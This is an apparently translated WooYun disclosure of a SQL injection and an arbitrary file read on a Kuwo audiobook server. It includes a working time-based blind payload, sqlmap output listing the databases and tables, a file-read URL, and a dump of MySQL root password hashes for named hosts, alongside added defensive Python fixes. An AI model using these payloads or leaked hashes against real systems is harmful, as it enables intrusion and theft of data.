
Vulnerability summary

Defect ID: wooyun-2016-0198775

Title: Kuwo: SQL injection with root privileges, plus arbitrary file read, at one location

Vendor: Kuwo Music (酷我音乐)

Author: 秋末诉伤

Submitted: 2016-04-21 10:25

Fixed: 2016-06-05 10:50

Published: 2016-06-05 10:50

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-04-21: details sent to the vendor, awaiting vendor action
2016-04-21: vendor confirmed; details disclosed to the vendor only
2016-05-01: details disclosed to core white hats and domain experts
2016-05-11: details disclosed to regular white hats
2016-05-21: details disclosed to intern white hats
2016-06-05: details disclosed to the public

Brief description:

root

Detailed description:

Kuwo Tingshu (audiobook) injection: http://60.28.216.70/ How to confirm this belongs to Kuwo? Look at the page source; how to confirm it is the Kuwo Tingshu site is covered in the details below.

[screenshot: 1.png]


http://60.28.216.70/log.php
POST: method=statbyparent&parentid=1&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4


Bring in sqlmap >>> DBA privileges

[screenshot: 2.png]


Parameter: parentid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: method=statbyparent&parentid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jZkD) AND 'NFGP'='NFGP&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])


sqlmap identified the following injection point(s) with a total of 2632 HTTP(s) requests:
---
Parameter: parentid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: method=statbyparent&parentid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jZkD) AND 'NFGP'='NFGP&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
information_schema
[*] kuwofm_online
[*] kw_tingshu
[*] kwts_user
[*] logstat
[*] mysql
[*] performance_schema
[*] test
[*] tsbiz
[*] tsbook
[*] tslog
[*] umeng
Database: kuwofm_online
[56 tables]
+-----------------------------------+
| user |
| version |
| apscheduler_jobs |
| audio_file |
| category |
| channel |
| channel_UV |
| channel_bak |
| channel_category_map |
| channel_music |
| defined_play_column |
| defined_play_column_map |
| file_sequence |
| fm_channel_playback |
| fm_channel_program |
| fm_date_storage_map |
| fm_failed_order |
| fm_product_define |
| fm_program_category |
| fm_program_category_map |
| fm_program_daily |
| fm_program_hot |
| fm_program_record |
| fm_program_record_play |
| fm_recommend_banner |
| fm_recommend_banner_programlist |
| fm_recommend_program |
| fm_success_order |
| fm_user |
| fm_user_product |
| hls_host |
| location |
| message_push |
| message_push_configuration |
| music |
| param_conf |
| program |
| recommend |
| record_play_banner |
| record_play_hot |
| record_play_role_map |
| record_program_category |
| record_program_feedback |
| record_program_tag_map |
| record_program_task |
| record_tag |
| record_tag_category |
| record_tag_map |
| star_channel |
| temp_channel |
| test |
| url_map |
| user_channel |
| user_listen_record |
| user_modifytime |
| user_record_play_collection |
+-----------------------------------+
Database: kw_tingshu
[23 tables]
+-----------------------------------+
| paytmp |
| tbl_book_basic |
| tbl_book_basic_offline |
| tbl_book_cat_relation |
| tbl_book_extra |
| tbl_book_statistics |
| tbl_business_user |
| tbl_cat |
| tbl_chapter |
| tbl_chapter_tmp |
| tbl_login_log |
| tbl_order |
| tbl_pay_log |
| tbl_umeng_new_user |
| tbl_uninstall |
| tbl_user_activity |
| tbl_user_base |
| tmp_ad |
| tmp_ad2 |
| usertmp |
| vip_pay_3 |
| vip_pay_jan |
| vip_pay_tmp |
+-----------------------------------+
Database: kwts_user
[1 table]
+-----------------------------------+
| user_classify |
+-----------------------------------+
Database: tsbook
[34 tables]
+-----------------------------------+
| bookr |
| tbl_3rd_zhuishu |
| tbl_book |
| tbl_book_cat |
| tbl_book_data |
| tbl_book_day_log |
| tbl_book_extr |
| tbl_book_log |
| tbl_book_mass |
| tbl_book_tmp |
| tbl_cat |
| tbl_cat_copy |
| tbl_chapter |
| tbl_chapter_data |
| tbl_chapter_log |
| tbl_chapter_tmp |
| tbl_copyright |
| tbl_editor_newest |
| tbl_editor_novel |
| tbl_editor_novel_top |
| tbl_editor_rec_type |
| tbl_editor_recommend |
| tbl_editor_startpage |
| tbl_editor_tag |
| tbl_editor_textlink_login_channel |
| tbl_focus_list |
| tbl_focus_list_tmp |
| tbl_focus_type |
| tbl_page_layout |
| tbl_topic |
| tbl_topic_detail |
| third_app_key |
| tmp_book_cnt |
| tmp_data |
+-----------------------------------+
Database: tsbiz
[13 tables]
+-----------------------------------+
| tbl_activate |
| tbl_ad_flag |
| tbl_ad_list |
| tbl_invite |
| tbl_invite_vip_log |
| tbl_ios_active_idfa |
| tbl_ios_mark_idfas |
| tbl_lucky_ids |
| tbl_lucky_prize_list |
| tbl_mip_order |
| tbl_music_rank_rec |
| tbl_music_ranking |
| tbl_vip_pay_log |
+-----------------------------------+
[22:55:20] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 8 times
[22:55:20] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
[22:55:20] [INFO] fetched data logged to text files under '/root/.sqlmap/output/60.28.216.70'
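As an added defensive example (not code from the report or from Kuwo), the following Python shows why the parentid value above reaches the SQL engine and how the handler should treat it instead. The table name, columns and sample rows are constructed, and sqlite3 stands in for the MySQL backend so the example runs offline; the payload string is the one sqlmap reported above.

```python
import re
import sqlite3

# The time-based blind payload exactly as sqlmap reported it for the
# parentid parameter of log.php in the report above.
SQLMAP_PAYLOAD = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))jZkD) AND 'NFGP'='NFGP"


def make_demo_db():
    """Constructed stand-in for the audiobook statistics table.

    The real backend is MySQL; sqlite3 is used only so this runs offline.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE stat (parentid INTEGER, bookid TEXT, plays INTEGER)")
    conn.executemany(
        "INSERT INTO stat VALUES (?, ?, ?)",
        [(1, "book-a", 12), (1, "book-b", 3), (2, "book-c", 7)],
    )
    conn.commit()
    return conn


def stat_by_parent_vulnerable(conn, parentid):
    """The pattern the report implies: the request value is spliced into SQL."""
    sql = "SELECT parentid, bookid, plays FROM stat WHERE parentid = '%s'" % parentid
    return conn.execute(sql).fetchall()


def stat_by_parent(conn, parentid):
    """Hardened form: strict type check first, then a bound parameter."""
    if not isinstance(parentid, str) or not re.fullmatch(r"[0-9]{1,10}", parentid):
        raise ValueError("parentid must be a decimal integer")
    sql = "SELECT parentid, bookid, plays FROM stat WHERE parentid = ?"
    return conn.execute(sql, (int(parentid),)).fetchall()


def outcome(handler, conn, parentid):
    """Summarise what happened to one request value as a short string."""
    try:
        return "rows:%d" % len(handler(conn, parentid))
    except ValueError:
        return "rejected"
    except sqlite3.OperationalError as exc:
        # The injected text was compiled as SQL. On MySQL, SLEEP(5) would stall
        # the query (the timing signal sqlmap used); SQLite has no SLEEP and
        # errors out instead, which proves the same point.
        return "sql-parsed:%s" % exc


def demo():
    """Run the benign value and the reported payload through both handlers."""
    conn = make_demo_db()
    return {
        "vulnerable_normal": outcome(stat_by_parent_vulnerable, conn, "1"),
        "vulnerable_payload": outcome(stat_by_parent_vulnerable, conn, SQLMAP_PAYLOAD),
        "hardened_normal": outcome(stat_by_parent, conn, "1"),
        "hardened_payload": outcome(stat_by_parent, conn, SQLMAP_PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

The bound parameter alone is enough to stop the injection; the integer check in front of it additionally keeps malformed values out of the application log, and the database account the handler connects with should not be the DBA-level account sqlmap found here.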


Kuwo Tingshu site:

[screenshot: 3.png]


--------------------------------------------------------------------------------
Arbitrary file read:

http://60.28.216.70/download.php?file=/data1/logdata/temp/stat_parentid_1.txt
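Added example (not the site's download.php), in Python: the URL above hands an absolute server path straight to the file parameter, so the fix is to resolve every request inside one directory and reject anything that escapes it. The root directory is taken from the URL above and assumed to be the only directory the endpoint should serve; the .txt filename allowlist is likewise an assumption for the example.

```python
import posixpath
import re

# Directory the report's download URL points into. Assumed here to be the only
# directory download.php is meant to serve from.
ALLOWED_ROOT = "/data1/logdata/temp"
# Assumption: only plain-text stat files are meant to be downloadable.
ALLOWED_NAME = re.compile(r"[A-Za-z0-9_.-]+\.txt")


def resolve_download(requested, root=ALLOWED_ROOT):
    """Map a user-supplied file parameter to a path inside root, or None.

    The value must already be URL-decoded (as PHP's $_GET does) before it
    reaches this function.
    """
    if not isinstance(requested, str) or not requested or "\x00" in requested:
        return None
    # Absolute paths, as in the report's URL, are never accepted; backslashes
    # are rejected so a Windows-style separator cannot slip past the checks.
    if requested.startswith("/") or "\\" in requested:
        return None
    candidate = posixpath.normpath(posixpath.join(root, requested))
    # Containment check after normalisation: "sub/../x" is fine, "../../etc/passwd" is not.
    if not candidate.startswith(root + "/"):
        return None
    if not ALLOWED_NAME.fullmatch(posixpath.basename(candidate)):
        return None
    return candidate


def classify(requests):
    """Constructed request values mapped to the path served or None."""
    return {r: resolve_download(r) for r in requests}


if __name__ == "__main__":
    samples = [
        "stat_parentid_1.txt",                        # legitimate
        "/data1/logdata/temp/stat_parentid_1.txt",    # absolute path, as in the URL above
        "../../../etc/passwd",                        # traversal out of the root
        "sub/../stat_parentid_1.txt",                 # normalises back inside the root
        "stat_parentid_1.txt\x00.jpg",                # NUL-byte truncation attempt
        "config.php",                                 # wrong extension
    ]
    for req, path in classify(samples).items():
        print(repr(req), "->", path)
```

On a filesystem where symlinks may exist under the served directory, resolve the candidate with os.path.realpath before the containment check as well, so a link pointing outside the root is also rejected.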


----------------------------------------------------------------------
Attached: the database user configuration; the IP addresses show it is Kuwo's.

Host,User,plugin,Password,ssl_type,Drop_priv,File_priv,Grant_priv,Alter_priv,ssl_cipher,Index_priv,Event_priv,Super_priv,Create_priv,Update_priv,Reload_priv,Delete_priv,Insert_priv,x509_issuer,Select_priv,max_updates,Execute_priv,Show_db_priv,x509_subject,Process_priv,Trigger_priv,Shutdown_priv,max_questions,Show_view_priv,max_connections,Repl_slave_priv,References_priv,Repl_client_priv,Create_user_priv,password_expired,Lock_tables_priv,Create_view_priv,Alter_routine_priv,Create_routine_priv,max_user_connections,authentication_string,Create_tmp_table_priv,Create_tablespace_priv
127.0.0.1,root,<blank>,<blank>,<blank>,Y,Y,Y,Y,<blank>,Y,Y,Y,Y,Y,Y,Y,Y,<blank>,Y,0,Y,Y,<blank>,Y,Y,Y,0,Y,0,Y,Y,Y,Y,N,Y,Y,Y,Y,0,<blank>,Y,Y
192.168.%,kwts,mysql_native_password,*E7E14591B4390736D0BEA2602FED5C7A908858B0
192.168.0.39,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.51,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.52,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.53,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.201.176,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.201.179,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.226.166,nagios,mysql_native_password,*854A5FFA0256648A594D2D46C12610BE25FDB957
60.28.198.51,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.198.52,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.210.91,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.216.69,root,mysql_nativ,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B


Reviewers, please mask this..
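The dump above is exactly what a database owner should be auditing for. As an added example (not from the report), this Python reads a CSV in the same shape as the sqlmap output and flags blank passwords, root accounts reachable from remote hosts, wildcard hosts, non-root accounts holding FILE/SUPER/GRANT, and a password hash reused across accounts. The sample rows, account names and hashes are constructed placeholders, not values from the page.

```python
import csv
import io
from collections import defaultdict

# Constructed sample in the same CSV shape as the mysql.user dump above.
# Hashes and account names are placeholders, not values from the report.
SAMPLE_USER_DUMP = """\
Host,User,plugin,Password,File_priv,Super_priv,Grant_priv
127.0.0.1,root,<blank>,<blank>,Y,Y,Y
192.168.%,app_user,mysql_native_password,*PLACEHOLDER_HASH_A,Y,N,N
192.168.0.39,root,mysql_native_password,*PLACEHOLDER_HASH_B,Y,Y,Y
60.28.0.1,root,mysql_native_password,*PLACEHOLDER_HASH_B,Y,Y,Y
192.168.226.166,nagios,mysql_native_password,*PLACEHOLDER_HASH_C,N,N,N
"""

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
# Privileges that let an account read server files, bypass limits or hand out
# rights; an application account never needs them.
DANGEROUS_PRIVS = ("File_priv", "Super_priv", "Grant_priv")


def parse_user_dump(text):
    """Parse the dump; sqlmap prints empty cells as '<blank>', so map those to ''."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        rows.append({k: ("" if v == "<blank>" else v) for k, v in row.items()})
    return rows


def credential(row):
    """Password hash for a row; newer MySQL keeps it in authentication_string."""
    return row.get("Password") or row.get("authentication_string") or ""


def audit_mysql_users(text):
    """Return (host, user, finding) triples for every risky row in the dump."""
    rows = parse_user_dump(text)
    owners = defaultdict(set)
    for r in rows:
        if credential(r):
            owners[credential(r)].add((r["User"], r["Host"]))
    findings = []
    for r in rows:
        host, user, h = r["Host"], r["User"], credential(r)
        if not h:
            findings.append((host, user, "blank-password"))
        if user == "root" and host not in LOCAL_HOSTS:
            findings.append((host, user, "remote-root"))
        if "%" in host:
            findings.append((host, user, "wildcard-host"))
        if user != "root":
            excess = [p for p in DANGEROUS_PRIVS if r.get(p) == "Y"]
            if excess:
                findings.append((host, user, "excess-priv:" + ",".join(excess)))
        if h and len(owners[h]) > 1:
            # Same hash on several user@host entries: one leak opens all of them.
            findings.append((host, user, "shared-password"))
    return findings


if __name__ == "__main__":
    for host, user, finding in audit_mysql_users(SAMPLE_USER_DUMP):
        print(f"{user}@{host}: {finding}")
```

Run against a real SELECT from mysql.user (or a sqlmap dump of it) the output is a remediation list: the blank local root password and the FILE privilege on the web application's account are the two items that turn an injection like the one above into file reads and a full takeover.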

Proof of vulnerability:

(Identical to the detailed description above.)

Remediation:

You know better than I do..

Copyright notice: when reposting, please credit the source: 秋末诉伤@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-04-21 10:43

Vendor reply:

Thank you for your support of Kuwo; we will review and fix this as soon as possible.

Latest status:

None yet